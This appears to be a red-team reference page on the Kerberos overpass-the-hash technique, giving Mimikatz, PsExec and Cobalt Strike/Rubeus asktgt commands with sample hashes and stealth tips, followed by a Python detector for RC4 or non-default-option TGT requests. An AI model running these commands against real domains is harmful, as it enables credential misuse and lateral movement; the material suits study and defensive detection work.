Overpass-the-hash uses a dumped hash to obtain a Kerberos TGT or TGS, granting the attacker remote access to other domain-joined machines or services. See also pass-the-key, of which overpass-the-hash is the RC4-specific case.
Requirements
- The password hash must already be cached in memory to be dumpable.
- Local admin privileges are needed to dump the hash.
- The remote host must accept the RC4 encryption type.
The captured NTLM hash is used as the RC4 encryption key in pass-the-key to authenticate against Kerberos.
Example
Both methods are noticeable in logs, so pick your poison.
Mimikatz
- Use Mimikatz sekurlsa::pth to launch PowerShell as the compromised domain user. Mimikatz opens a handle to LSASS, which may stand out as suspicious.
- Do anything that requires Kerberos authentication to generate a TGT (e.g., net use \\dc01 to connect to a DC network share).
- Launch a remote PowerShell using PsExec.exe on dc01 (tool from SysInternals): .\PsExec.exe \\dc01 cmd.exe. Using the hostname / domain name is mandatory, since using an IP address falls back to NTLM authentication.
- Alternatively, consider using the TGT in a pass-the-ticket attack.
Rubeus
- Cobalt Strike beacon & Rubeus with RC4/NTLM hash:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap
- Alternatively use AES256:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap
- Use the /opsec switch to make the ticket options flag 0x40810010 instead of 0x40800010.
- Follow the same steps in the previous section.
RC4 is considered a legacy ticket encryption type, so a TGT request using it is much more likely to be noticed.
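The two tells mentioned above (an RC4 TGT request, and Rubeus' non-default ticket options 0x40800010 when /opsec is not used) are exactly what a defender can look for in domain controller TGT-request events. The following is an added detection example, not code from the page or from the Rubeus/Mimikatz projects; it assumes the field names of Windows Security event 4768 (TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256) and runs over constructed sample lines.

```python
import re

# Constructed sample lines modelled on the fields of Windows Security event 4768
# (Kerberos TGT requested); these are not real logs. Etype 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=jking IpAddress=10.0.0.25 TicketEncryptionType=0x12 TicketOptions=0x40810010",
    "EventID=4768 TargetUserName=jking IpAddress=10.0.0.25 TicketEncryptionType=0x17 TicketOptions=0x40800010",
    "EventID=4768 TargetUserName=jking IpAddress=10.0.0.25 TicketEncryptionType=0x12 TicketOptions=0x40800010",
    "EventID=4769 TargetUserName=jking IpAddress=10.0.0.25 TicketEncryptionType=0x17 TicketOptions=0x40810000",
]

RC4_HMAC = 0x17
# Ticket options a stock Windows client sends for a TGT request (forwardable, renewable,
# canonicalize, renewable-ok). Rubeus asktgt without /opsec sends 0x40800010 instead.
DEFAULT_CLIENT_TGT_OPTIONS = 0x40810010

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn a 'key=value ...' event line into a dict; hex fields become ints."""
    fields = dict(FIELD_RE.findall(line))
    for key in ("TicketEncryptionType", "TicketOptions"):
        if key in fields:
            fields[key] = int(fields[key], 16)
    fields["EventID"] = int(fields["EventID"])
    return fields


def find_suspicious_tgt_requests(lines):
    """Return (user, ip, reasons) for each 4768 that looks like an overpass-the-hash TGT request."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev["EventID"] != 4768:
            continue  # only TGT requests; 4769 (TGS requests) are out of scope here
        reasons = []
        if ev["TicketEncryptionType"] == RC4_HMAC:
            # Legacy etype. Strongest when the account has AES keys and normally uses them;
            # accounts that genuinely lack AES keys will produce false positives here.
            reasons.append("rc4_tgt")
        if ev["TicketOptions"] != DEFAULT_CLIENT_TGT_OPTIONS:
            reasons.append("nonstandard_ticket_options")  # e.g. 0x40800010 from tooling without /opsec
        if reasons:
            hits.append((ev["TargetUserName"], ev["IpAddress"], reasons))
    return hits


if __name__ == "__main__":
    for user, ip, reasons in find_suspicious_tgt_requests(SAMPLE_EVENTS):
        print(f"{user}@{ip}: {', '.join(reasons)}")
```

Note that the AES request with /opsec-style options (the first sample line) produces no hit, which is the point the page makes about why the AES256 and /opsec variants are quieter.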